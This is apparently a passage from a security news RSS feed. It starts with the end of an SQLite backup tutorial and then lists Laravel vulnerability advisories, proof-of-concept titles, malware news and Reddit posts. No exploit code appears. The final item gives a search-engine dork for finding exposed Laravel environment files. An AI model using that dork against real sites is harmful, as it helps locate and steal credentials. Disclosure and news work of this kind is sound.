database to the temp directory.<br>sqlite3 /path/to/db "VACUUM INTO '/path/to/backup'"<br><br># Compress the backup file for more efficient storage<br>gzip /tmp/db<br><br># Upload backup to S3 using a rolling daily naming scheme.<br>aws s3 cp /tmp/db.gz s3://mybucket/db-`date +%d`.gz</pre><p>A few notes:</p><ul><li>The -e option inset -e stands for “exit immediately”. This makes sure that the script will be stopped if any command fails.</li><li>SQLite’s VACUUM INTO command creates a compact backup of the SQLite database. It reduces fragmentation in the database and the file size. Think of it as a neat and tidy version of your database. However you don’t have to use VACUUM INTO ; you can replace it with .backup . This copies the entire database file, including all its data and structure as-is to another file.</li><li>SQLite databases compress well, and the gzip command facilitates this.</li><li>Finally, you can upload the copy of the file to your cloud storage provider of choice. Here we are uploading to S3.</li></ul><p>If you want to have your backups run automatically, you can configure crontab to run this job on a regular basis. Here we are running the script daily at midnight:</p><pre># Edit your cron jobs<br>crontab -e<br><br># Add this to the end of the crontab<br>0 0 * * * /path/to/my_backup_script.sh</pre><p>For write-heavy databases, where you would want to capture the state of the database at any given moment, you can use <a href="https://litestream.io/alternatives/cron/">Litestream</a>. This is an open-source tool designed to provide <em>real-time replication</em> for SQLite databases by streaming changes to a remote storage backend.</p><p>Litestream is able to track changes to SQLite’s WAL file. Remember the post-it notes? Whenever a new transaction is recorded to the WAL file, Litestream is able to replicate these incrementally to your cloud storage provider of choice. This allows us to maintain a near real-time backup of the database without creating full copies each time.</p><p>To get started with Litestream, you first have to install it. On MacOS this means using Homebrew. Then, you need to setup a litestream.yml configuration file:</p><pre># /etc/litestream.yml<br>dbs:<br>  - path: /path/to/your.db<br>    replicas:<br>      - type: s3<br>        bucket: your-s3-bucket-name<br>        path: your-database-name<br>        region: your-region</pre><p>Here, we are going to be streaming transactions to our database to an S3 bucket. Then we can run the following command to begin replication:</p><pre>litestream replicate -config /etc/litestream.yml</pre><p>In this case, we are setting any transactions in your.db to be replicated in an S3 bucket. That’s it! You are then able to restore a SQLite database to any previous state by replaying WAL changes. As an example, if you want to create a copy of your db called restored.db from a timestamp of 15:00 UTC dated 2024–12–10, you can run the following command:</p><pre>litestream restore -o /path/to/restored.db \<br>  -timestamp "2024-12-10T15:00:00Z" \<br>  s3://your-s3-bucket-name/your-database-name</pre><p>To get a backup of the latest version of your database, just omit the -timestamp flag .</p><h3>Conclusion</h3><p>I encourage you to watch this recent <a href="https://www.youtube.com/watch?v=wFUy120Fts8">talk at Rails World 2024</a> to see how SQLite is rapidly becoming production-ready. They have implemented some of the changes we have discussed here to their SQLite adapter. I also recommend reading <a href="https://fractaledmind.github.io/2024/04/15/sqlite-on-rails-the-how-and-why-of-optimal-performance/">Stephen Margheim’s article</a> detailing his work on SQLite in Rails if you want to dive deeper. You better believe these sorts of improvement are coming soon to <a href="https://gcollazo.com/optimal-sqlite-settings-for-django/">Django</a>, <a href="https://laravel-news.com/optimize-db-for-laravel-sqlite">Laravel</a>, etc.</p><p>The improvements to SQLite for production are not finished. David Heinemeier Hansson, creator of Rails, wants to push SQLite to be able to run a mid-size SaaS company off of. Exciting times!</p><a href="https://medium.com/media/d4e4130eaf199dae1a4bfff5596cf430/href">https://medium.com/media/d4e4130eaf199dae1a4bfff5596cf430/href</a><img src="https://medium.com/_/stat?event=post.clientViewed&amp;referrerSource=full_rss&amp;postId=94557bec095b" width="1" height="1" alt=""><hr><p><a href="https://towardsdatascience.com/sqlite-in-production-dreams-becoming-reality-94557bec095b">SQLite in Production: Dreams Becoming Reality</a> was originally published in <a href="https://towardsdatascience.com/">Towards Data Science</a> on Medium, where people are continuing the conversation by highlighting and responding to this story.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2024-40075 | Laravel 11.x xml external entity reference]]></title>
<description><![CDATA[A vulnerability was found in Laravel 11.x. It has been classified as problematic. Affected is an unknown function. The manipulation leads to xml external entity reference.

This vulnerability is traded as CVE-2024-40075. Access to the local network is required for this attack. There is no exploit...]]></description>
<link>https://tsecurity.de/de/2475633/sicherheitsluecken/cve-2024-40075-laravel-11x-xml-external-entity-reference/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2475633/sicherheitsluecken/cve-2024-40075-laravel-11x-xml-external-entity-reference/</guid>
<pubDate>Mon, 02 Dec 2024 20:22:16 +0100</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability was found in <a href="https://vuldb.com/?product.laravel">Laravel 11.x</a>. It has been classified as <a href="https://vuldb.com/?kb.risk">problematic</a>. Affected is an unknown function. The manipulation leads to xml external entity reference.

This vulnerability is traded as <a href="https://vuldb.com/?source_cve.272256">CVE-2024-40075</a>. Access to the local network is required for this attack. There is no exploit available.]]></content:encoded>
</item>
<item>
<title><![CDATA[Laravel 11.0 Cross Site Scripting]]></title>
<description><![CDATA[Laravel version 11.0 suffers from a cross site scripting vulnerability.]]></description>
<link>https://tsecurity.de/de/2475567/poc/laravel-110-cross-site-scripting/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2475567/poc/laravel-110-cross-site-scripting/</guid>
<pubDate>Mon, 02 Dec 2024 19:51:52 +0100</pubDate>
<category>⚠️ PoC</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Laravel version 11.0 suffers from a cross site scripting vulnerability.]]></content:encoded>
</item>
<item>
<title><![CDATA[Critical Laravel Vulnerability CVE-2024-52301 Allows Unauthorized Access]]></title>
<description><![CDATA[CVE-2024-52301 is a critical vulnerability identified in Laravel, a widely used PHP framework for building web applications. The vulnerability allows unauthorized access by exploiting improperly validated inputs, potentially leading to privilege escalation, data tampering, or full system compromi...]]></description>
<link>https://tsecurity.de/de/2443630/hacking/critical-laravel-vulnerability-cve-2024-52301-allows-unauthorized-access/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2443630/hacking/critical-laravel-vulnerability-cve-2024-52301-allows-unauthorized-access/</guid>
<pubDate>Fri, 15 Nov 2024 11:04:34 +0100</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>CVE-2024-52301 is a critical vulnerability identified in Laravel, a widely used PHP framework for building web applications. The vulnerability allows unauthorized access by exploiting improperly validated inputs, potentially leading to privilege escalation, data tampering, or full system compromise. Given Laravel’s widespread adoption across industries, the discovery is a cause for concern, as it could leave […]</p>
<p>The post <a href="https://gbhackers.com/critical-laravel-vulnerability/">Critical Laravel Vulnerability CVE-2024-52301 Allows Unauthorized Access</a> appeared first on <a href="https://gbhackers.com/">GBHackers Security | #1 Globally Trusted Cyber Security News Platform</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2024-7944 | itsourcecode Laravel Property Management System 1.0 DocumentsController.php UpdateDocumentsRequest unrestricted upload]]></title>
<description><![CDATA[A vulnerability was found in itsourcecode Laravel Property Management System 1.0. It has been classified as critical. Affected is the function UpdateDocumentsRequest of the file DocumentsController.php. The manipulation leads to unrestricted upload.

This vulnerability is traded as CVE-2024-7944....]]></description>
<link>https://tsecurity.de/de/2289321/sicherheitsluecken/cve-2024-7944-itsourcecode-laravel-property-management-system-10-documentscontrollerphp-updatedocumentsrequest-unrestricted-upload/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2289321/sicherheitsluecken/cve-2024-7944-itsourcecode-laravel-property-management-system-10-documentscontrollerphp-updatedocumentsrequest-unrestricted-upload/</guid>
<pubDate>Wed, 21 Aug 2024 10:07:30 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability was found in <a href="https://vuldb.com/?product.itsourcecode:laravel_property_management_system">itsourcecode Laravel Property Management System 1.0</a>. It has been classified as <a href="https://vuldb.com/?kb.risk">critical</a>. Affected is the function <code>UpdateDocumentsRequest</code> of the file <em>DocumentsController.php</em>. The manipulation leads to unrestricted upload.

This vulnerability is traded as <a href="https://vuldb.com/?source_cve.275136">CVE-2024-7944</a>. It is possible to launch the attack remotely. Furthermore, there is an exploit available.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2024-7945 | itsourcecode Laravel Property Management System 1.0 Notes Page /admin/notes/create Note text cross site scripting]]></title>
<description><![CDATA[A vulnerability was found in itsourcecode Laravel Property Management System 1.0. It has been declared as problematic. Affected by this vulnerability is an unknown functionality of the file /admin/notes/create of the component Notes Page. The manipulation of the argument Note text leads to cross ...]]></description>
<link>https://tsecurity.de/de/2289318/sicherheitsluecken/cve-2024-7945-itsourcecode-laravel-property-management-system-10-notes-page-adminnotescreate-note-text-cross-site-scripting/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2289318/sicherheitsluecken/cve-2024-7945-itsourcecode-laravel-property-management-system-10-notes-page-adminnotescreate-note-text-cross-site-scripting/</guid>
<pubDate>Wed, 21 Aug 2024 10:07:26 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability was found in <a href="https://vuldb.com/?product.itsourcecode:laravel_property_management_system">itsourcecode Laravel Property Management System 1.0</a>. It has been declared as <a href="https://vuldb.com/?kb.risk">problematic</a>. Affected by this vulnerability is an unknown functionality of the file <em>/admin/notes/create</em> of the component <em>Notes Page</em>. The manipulation of the argument <em>Note text</em> leads to cross site scripting.

This vulnerability is known as <a href="https://vuldb.com/?source_cve.275137">CVE-2024-7945</a>. The attack can be launched remotely. Furthermore, there is an exploit available.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2024-7943 | itsourcecode Laravel Property Management System 1.0 PropertiesController.php upload file unrestricted upload]]></title>
<description><![CDATA[A vulnerability was found in itsourcecode Laravel Property Management System 1.0 and classified as critical. This issue affects the function upload of the file PropertiesController.php. The manipulation of the argument file leads to unrestricted upload.

The identification of this vulnerability i...]]></description>
<link>https://tsecurity.de/de/2289017/sicherheitsluecken/cve-2024-7943-itsourcecode-laravel-property-management-system-10-propertiescontrollerphp-upload-file-unrestricted-upload/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2289017/sicherheitsluecken/cve-2024-7943-itsourcecode-laravel-property-management-system-10-propertiescontrollerphp-upload-file-unrestricted-upload/</guid>
<pubDate>Wed, 21 Aug 2024 07:05:48 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability was found in <a href="https://vuldb.com/?product.itsourcecode:laravel_property_management_system">itsourcecode Laravel Property Management System 1.0</a> and classified as <a href="https://vuldb.com/?kb.risk">critical</a>. This issue affects the function <code>upload</code> of the file <em>PropertiesController.php</em>. The manipulation of the argument <em>file</em> leads to unrestricted upload.

The identification of this vulnerability is <a href="https://vuldb.com/?source_cve.275135">CVE-2024-7943</a>. The attack may be initiated remotely. Furthermore, there is an exploit available.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2024-7495 | itsourcecode Laravel Accounting System 1.0 HomeController.php image unrestricted upload]]></title>
<description><![CDATA[A vulnerability, which was classified as critical, was found in itsourcecode Laravel Accounting System 1.0. This affects an unknown part of the file app/Http/Controllers/HomeController.php. The manipulation of the argument image leads to unrestricted upload.

This vulnerability is uniquely identi...]]></description>
<link>https://tsecurity.de/de/2286691/sicherheitsluecken/cve-2024-7495-itsourcecode-laravel-accounting-system-10-homecontrollerphp-image-unrestricted-upload/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2286691/sicherheitsluecken/cve-2024-7495-itsourcecode-laravel-accounting-system-10-homecontrollerphp-image-unrestricted-upload/</guid>
<pubDate>Tue, 20 Aug 2024 06:37:24 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability, which was classified as <a href="https://vuldb.com/?kb.risk">critical</a>, was found in <a href="https://vuldb.com/?product.itsourcecode:laravel_accounting_system">itsourcecode Laravel Accounting System 1.0</a>. This affects an unknown part of the file <em>app/Http/Controllers/HomeController.php</em>. The manipulation of the argument <em>image</em> leads to unrestricted upload.

This vulnerability is uniquely identified as <a href="https://vuldb.com/?source_cve.273621">CVE-2024-7495</a>. It is possible to initiate the attack remotely. Furthermore, there is an exploit available.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2024-7495 | itsourcecode Laravel Accounting System 1.0 HomeController.php image unrestricted upload]]></title>
<description><![CDATA[A vulnerability, which was classified as critical, was found in itsourcecode Laravel Accounting System 1.0. This affects an unknown part of the file app/Http/Controllers/HomeController.php. The manipulation of the argument image leads to unrestricted upload.

This vulnerability is uniquely identi...]]></description>
<link>https://tsecurity.de/de/2286690/sicherheitsluecken/cve-2024-7495-itsourcecode-laravel-accounting-system-10-homecontrollerphp-image-unrestricted-upload/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2286690/sicherheitsluecken/cve-2024-7495-itsourcecode-laravel-accounting-system-10-homecontrollerphp-image-unrestricted-upload/</guid>
<pubDate>Tue, 20 Aug 2024 06:37:24 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability, which was classified as <a href="https://vuldb.com/?kb.risk">critical</a>, was found in <a href="https://vuldb.com/?product.itsourcecode:laravel_accounting_system">itsourcecode Laravel Accounting System 1.0</a>. This affects an unknown part of the file <em>app/Http/Controllers/HomeController.php</em>. The manipulation of the argument <em>image</em> leads to unrestricted upload.

This vulnerability is uniquely identified as <a href="https://vuldb.com/?source_cve.273621">CVE-2024-7495</a>. It is possible to initiate the attack remotely. Furthermore, there is an exploit available.]]></content:encoded>
</item>
<item>
<title><![CDATA[File permission confusion]]></title>
<description><![CDATA[I’ve placed a file.php with 000 permission in /public folder (folder 755) Beside 000 permission to file it works on browser via Apache server? . It supposed to show access denied. Whereas, SSH show access denied. I’m using Apache. Debian 12.  Purpose of testing: the site developed in Laravel 9 co...]]></description>
<link>https://tsecurity.de/de/2282705/linux-tipps/file-permission-confusion/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2282705/linux-tipps/file-permission-confusion/</guid>
<pubDate>Sat, 17 Aug 2024 07:16:02 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<!-- SC_OFF --><div class="md"><p>I’ve placed a file.php with 000 permission in /public folder (folder 755) Beside 000 permission to file it works on browser via Apache server? . It supposed to show access denied. Whereas, SSH show access denied. I’m using Apache. Debian 12. </p> <p>Purpose of testing: the site developed in Laravel 9 contains a public directory by default that is accessible via a browser. I'm afraid that a bad attempt on /public in anyway may run PHP. (like like a malware) </p> <p>Structure The directory drwxr-xr-x 6 user1 client4 4096 Aug 16 18:46 public</p> <p>The file ---------- 1 user1 client4 22 Aug 16 21:09 myfile.php</p> <p>This file is placed PWD /home/user1/web/public Laravel 9 Project</p> </div><!-- SC_ON -->   submitted by   <a href="https://www.reddit.com/user/waqaspuri"> /u/waqaspuri </a> <br> <span><a href="https://www.reddit.com/r/linux/comments/1eua16s/file_permission_confusion/">[link]</a></span>   <span><a href="https://www.reddit.com/r/linux/comments/1eua16s/file_permission_confusion/">[comments]</a></span>]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2024-7067 | kirilkirkov Ecommerce-Laravel-Bootstrap up to 1f1097a3448ce8ec53e034ea0f70b8e2a0e64a87 app/Cart.php getCartProductsIds laraCart deserialization]]></title>
<description><![CDATA[A vulnerability was found in kirilkirkov Ecommerce-Laravel-Bootstrap up to 1f1097a3448ce8ec53e034ea0f70b8e2a0e64a87. It has been rated as critical. Affected by this issue is the function getCartProductsIds of the file app/Cart.php. The manipulation of the argument laraCart leads to deserializatio...]]></description>
<link>https://tsecurity.de/de/2243599/sicherheitsluecken/cve-2024-7067-kirilkirkov-ecommerce-laravel-bootstrap-up-to-1f1097a3448ce8ec53e034ea0f70b8e2a0e64a87-appcartphp-getcartproductsids-laracart-deserialization/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2243599/sicherheitsluecken/cve-2024-7067-kirilkirkov-ecommerce-laravel-bootstrap-up-to-1f1097a3448ce8ec53e034ea0f70b8e2a0e64a87-appcartphp-getcartproductsids-laracart-deserialization/</guid>
<pubDate>Wed, 24 Jul 2024 16:52:09 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability was found in <a href="https://vuldb.com/?product.kirilkirkov:ecommerce-laravel-bootstrap">kirilkirkov Ecommerce-Laravel-Bootstrap up to 1f1097a3448ce8ec53e034ea0f70b8e2a0e64a87</a>. It has been rated as <a href="https://vuldb.com/?kb.risk">critical</a>. Affected by this issue is the function <code>getCartProductsIds</code> of the file <em>app/Cart.php</em>. The manipulation of the argument <em>laraCart</em> leads to deserialization.

This vulnerability is handled as <a href="https://vuldb.com/?source_cve.272348">CVE-2024-7067</a>. The attack may be launched remotely. Furthermore, there is an exploit available.

This product is using a rolling release to provide continious delivery. Therefore, no version details for affected nor updated releases are available. It is recommended to apply a patch to fix this issue.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2024-6056 | nasirkhan Laravel Starter up to 11.8.0 Password Reset /forgot-password Email observable response discrepancy]]></title>
<description><![CDATA[A vulnerability was found in nasirkhan Laravel Starter up to 11.8.0. It has been rated as problematic. Affected by this issue is some unknown functionality of the file /forgot-password of the component Password Reset Handler. The manipulation of the argument Email leads to observable response dis...]]></description>
<link>https://tsecurity.de/de/2191422/sicherheitsluecken/cve-2024-6056-nasirkhan-laravel-starter-up-to-1180-password-reset-forgot-password-email-observable-response-discrepancy/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2191422/sicherheitsluecken/cve-2024-6056-nasirkhan-laravel-starter-up-to-1180-password-reset-forgot-password-email-observable-response-discrepancy/</guid>
<pubDate>Fri, 21 Jun 2024 05:53:48 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability was found in <a href="https://vuldb.com/?product.nasirkhan:laravel_starter">nasirkhan Laravel Starter up to 11.8.0</a>. It has been rated as <a href="https://vuldb.com/?kb.risk">problematic</a>. Affected by this issue is some unknown functionality of the file <em>/forgot-password</em> of the component <em>Password Reset Handler</em>. The manipulation of the argument <em>Email</em> leads to observable response discrepancy.

This vulnerability is handled as <a href="https://vuldb.com/?source_cve.268784">CVE-2024-6056</a>. The attack may be launched remotely. Furthermore, there is an exploit available.

The vendor was contacted early about this disclosure but did not respond in any way.]]></content:encoded>
</item>
<item>
<title><![CDATA[Install Valet Linux+ development environment]]></title>
<description><![CDATA[submitted by    /u/hernandez054   [link]   [comments]]]></description>
<link>https://tsecurity.de/de/2186245/linux-tipps/install-valet-linux-development-environment/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2186245/linux-tipps/install-valet-linux-development-environment/</guid>
<pubDate>Tue, 18 Jun 2024 11:16:25 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[  submitted by   <a href="https://www.reddit.com/user/hernandez054"> /u/hernandez054 </a> <br> <span><a href="https://qirolab.com/posts/install-laravel-valet-linux-development-environment-on-ubuntu">[link]</a></span>   <span><a href="https://www.reddit.com/r/linux/comments/1dim6i3/install_valet_linux_development_environment/">[comments]</a></span>]]></content:encoded>
</item>
<item>
<title><![CDATA[The state of permissive vs copyleft licensing models]]></title>
<description><![CDATA[Correct me if I'm wrong but about two decades ago (mid 2000s), most popular software in the FOSS world was GPL licensed including Linux, WordPress and Drupal. And then started a massive crusade of sorts against copyleft as folks started calling out GPL as "viral" and "infecting" of their downstre...]]></description>
<link>https://tsecurity.de/de/2172647/linux-tipps/the-state-of-permissive-vs-copyleft-licensing-models/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2172647/linux-tipps/the-state-of-permissive-vs-copyleft-licensing-models/</guid>
<pubDate>Sun, 09 Jun 2024 21:46:07 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<!-- SC_OFF --><div class="md"><p>Correct me if I'm wrong but about two decades ago (mid 2000s), most popular software in the FOSS world was GPL licensed including Linux, WordPress and Drupal.</p> <p>And then started a massive crusade of sorts against copyleft as folks started calling out GPL as "viral" and "infecting" of their downstream works. They started to prefer permissive licenses more as it suited some people's definition of software freedom. The GPL folks, on the other hand, made it an all or none issue, they wanted to license ALL software under GPL and the other side thought that idea was anti diversity.</p> <p>This is very much akin to the editor wars of the Boomer era (Vim vs Emacs) or the IDE wars of the millennial era (Visual Basic vs Borland Delphi, even Netbeans vs Eclipse).</p> <p>That's where we stand today and a huge majority of folks seem to have moved to permissive licenses like Apache, MIT and BSD licenses. Both Laravel and Symfony are MIT licensed. However, the other side isn't decimated yet, we also have Libre Office under GPL v3 and ffmpeg under LGPL. I have a feeling that given the rise of big tech and authoritarianism in computing over the last decade, the next decade will turn the pendulum back towards copyleft.</p> <p>Consider the gradual decline in things like right to repair and software ownership, smart phones don't have removable batteries anymore, laptops come with restrictive UEFI firmware that won't let Linux installed, etc. The most popular browser of our time is about to upgrade the manifest version next month with the sole objective of restricting their user's ability to block ads and nothing else.</p> <p>In times like these, sticking to libre software ideals become more important and I hope more folks will release their works under copyleft instead of permissive licenses.</p> <p>The way I see it, copyleft protects the freedoms of all computer users or commons as whole while permissive licenses defend the individual freedom of software developer (which sadly also comes with the freedom to abuse said software by turning it into a proprietary walled garden).</p> <p>Copyleft and permissive aren't just two types of licenses if you think about it, they also reflect two deep philosophies or ways of life and at the epicenter of each is the very definition of software freedom.</p> </div><!-- SC_ON -->   submitted by   <a href="https://www.reddit.com/user/pyeri"> /u/pyeri </a> <br> <span><a href="https://www.reddit.com/r/linux/comments/1dc4wxc/the_state_of_permissive_vs_copyleft_licensing/">[link]</a></span>   <span><a href="https://www.reddit.com/r/linux/comments/1dc4wxc/the_state_of_permissive_vs_copyleft_licensing/">[comments]</a></span>]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2024-29291 | Laravel Framework 8/9/10/11 storage/logs/laravel.log information disclosure]]></title>
<description><![CDATA[A vulnerability has been found in Laravel Framework 8/9/10/11 and classified as problematic. This vulnerability affects unknown code of the file storage/logs/laravel.log. The manipulation leads to information disclosure.

This vulnerability was named CVE-2024-29291. The attack can be initiated re...]]></description>
<link>https://tsecurity.de/de/2159887/sicherheitsluecken/cve-2024-29291-laravel-framework-891011-storagelogslaravellog-information-disclosure/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2159887/sicherheitsluecken/cve-2024-29291-laravel-framework-891011-storagelogslaravellog-information-disclosure/</guid>
<pubDate>Sat, 01 Jun 2024 09:38:37 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability has been found in <a href="https://vuldb.com/?product.laravel:framework">Laravel Framework 8/9/10/11</a> and classified as <a href="https://vuldb.com/?kb.risk">problematic</a>. This vulnerability affects unknown code of the file <em>storage/logs/laravel.log</em>. The manipulation leads to information disclosure.

This vulnerability was named <a href="https://vuldb.com/?source_cve.261022">CVE-2024-29291</a>. The attack can be initiated remotely. Furthermore, there is an exploit available.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2020-10963 | FrozenNode Laravel-Administrator up to 5.0.12 Image Upload file_upload GIF Image unrestricted upload (ID 160243)]]></title>
<description><![CDATA[A vulnerability, which was classified as critical, has been found in FrozenNode Laravel-Administrator up to 5.0.12. Affected by this issue is some unknown functionality of the file admin/tips_image/image/file_upload of the component Image Upload. The manipulation as part of GIF Image leads to unr...]]></description>
<link>https://tsecurity.de/de/2129530/sicherheitsluecken/cve-2020-10963-frozennode-laravel-administrator-up-to-5012-image-upload-fileupload-gif-image-unrestricted-upload-id-160243/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2129530/sicherheitsluecken/cve-2020-10963-frozennode-laravel-administrator-up-to-5012-image-upload-fileupload-gif-image-unrestricted-upload-id-160243/</guid>
<pubDate>Tue, 30 Apr 2024 12:24:20 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability, which was classified as <a href="https://vuldb.com/?kb.risk">critical</a>, has been found in <a href="https://vuldb.com/?product.frozennode:laravel-administrator">FrozenNode Laravel-Administrator up to 5.0.12</a>. Affected by this issue is some unknown functionality of the file <em>admin/tips_image/image/file_upload</em> of the component <em>Image Upload</em>. The manipulation as part of <em>GIF Image</em> leads to unrestricted upload.

This vulnerability is handled as <a href="https://vuldb.com/?source_cve.152282">CVE-2020-10963</a>. The attack may be launched remotely. There is no exploit available.]]></content:encoded>
</item>
<item>
<title><![CDATA[New 'LLMjacking' Attack Exploits Stolen Cloud Credentials]]></title>
<description><![CDATA[Sysdig said the attackers gained access to these credentials from a vulnerable version of Laravel]]></description>
<link>https://tsecurity.de/de/2127078/it-security-nachrichten/new-llmjacking-attack-exploits-stolen-cloud-credentials/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2127078/it-security-nachrichten/new-llmjacking-attack-exploits-stolen-cloud-credentials/</guid>
<pubDate>Sun, 28 Apr 2024 10:34:23 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Sysdig said the attackers gained access to these credentials from a vulnerable version of Laravel]]></content:encoded>
</item>
<item>
<title><![CDATA[Laravel Framework 11 Credential Disclosure]]></title>
<description><![CDATA[Laravel Framework version 11 suffers from a credential disclosure vulnerability.]]></description>
<link>https://tsecurity.de/de/2104641/poc/laravel-framework-11-credential-disclosure/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2104641/poc/laravel-framework-11-credential-disclosure/</guid>
<pubDate>Thu, 11 Apr 2024 03:09:37 +0200</pubDate>
<category>⚠️ PoC</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Laravel Framework version 11 suffers from a credential disclosure vulnerability.]]></content:encoded>
</item>
<item>
<title><![CDATA[#0daytoday #Laravel Framework 11 - Credential Leakage Vulnerability CVE-2024-29291 [webapps #exploits #Vulnerability #0day #Exploit]]]></title>
<description><![CDATA[]]></description>
<link>https://tsecurity.de/de/2103173/poc/0daytoday-laravel-framework-11-credential-leakage-vulnerability-cve-2024-29291-webapps-exploits-vulnerability-0day-exploit/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2103173/poc/0daytoday-laravel-framework-11-credential-leakage-vulnerability-cve-2024-29291-webapps-exploits-vulnerability-0day-exploit/</guid>
<pubDate>Wed, 10 Apr 2024 05:35:33 +0200</pubDate>
<category>⚠️ PoC</category>
<source url="https://tsecurity.de">tsecurity.de</source>
</item>
<item>
<title><![CDATA[[webapps] Laravel Framework 11 - Credential Leakage]]></title>
<description><![CDATA[Laravel Framework 11 - Credential Leakage]]></description>
<link>https://tsecurity.de/de/2101620/poc/webapps-laravel-framework-11-credential-leakage/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2101620/poc/webapps-laravel-framework-11-credential-leakage/</guid>
<pubDate>Mon, 08 Apr 2024 22:20:33 +0200</pubDate>
<category>⚠️ PoC</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Laravel Framework 11 - Credential Leakage]]></content:encoded>
</item>
<item>
<title><![CDATA[AndroxGh0st Malware Targets Laravel Apps to Steal Cloud Credentials]]></title>
<description><![CDATA[Cybersecurity researchers have shed light on a tool referred to as AndroxGh0st that's used to target Laravel applications and steal sensitive data.
"It works by scanning and taking out important information from .env files, revealing login details linked to AWS and Twilio," Juniper Threat Labs re...]]></description>
<link>https://tsecurity.de/de/2071465/it-security-nachrichten/androxgh0st-malware-targets-laravel-apps-to-steal-cloud-credentials/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2071465/it-security-nachrichten/androxgh0st-malware-targets-laravel-apps-to-steal-cloud-credentials/</guid>
<pubDate>Thu, 14 Mar 2024 02:54:06 +0100</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Cybersecurity researchers have shed light on a tool referred to as AndroxGh0st that's used to target Laravel applications and steal sensitive data.
"It works by scanning and taking out important information from .env files, revealing login details linked to AWS and Twilio," Juniper Threat Labs researcher Kashinath T Pattan said.
"Classified as an SMTP cracker, it exploits SMTP]]></content:encoded>
</item>
<item>
<title><![CDATA[Laravel 11: Neue Anwendungsstruktur und SQLite-Standardunterstützung]]></title>
<description><![CDATA[Das Update des PHP-Framework Laravel bringt skalierbare Echtzeitkommunikation mit Laravel Reverb, eine vereinfachte Anwendungsstruktur und Queue Testing.]]></description>
<link>https://tsecurity.de/de/2068023/it-nachrichten/laravel-11-neue-anwendungsstruktur-und-sqlite-standardunterstuetzung/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2068023/it-nachrichten/laravel-11-neue-anwendungsstruktur-und-sqlite-standardunterstuetzung/</guid>
<pubDate>Wed, 13 Mar 2024 10:34:30 +0100</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Das Update des PHP-Framework Laravel bringt skalierbare Echtzeitkommunikation mit Laravel Reverb, eine vereinfachte Anwendungsstruktur und Queue Testing.]]></content:encoded>
</item>
<item>
<title><![CDATA[Laravel Env file Access Open Directory]]></title>
<description><![CDATA[intitle:"index of" env.cgi]]></description>
<link>https://tsecurity.de/de/2022967/sicherheitsluecken/laravel-env-file-access-open-directory/</link>
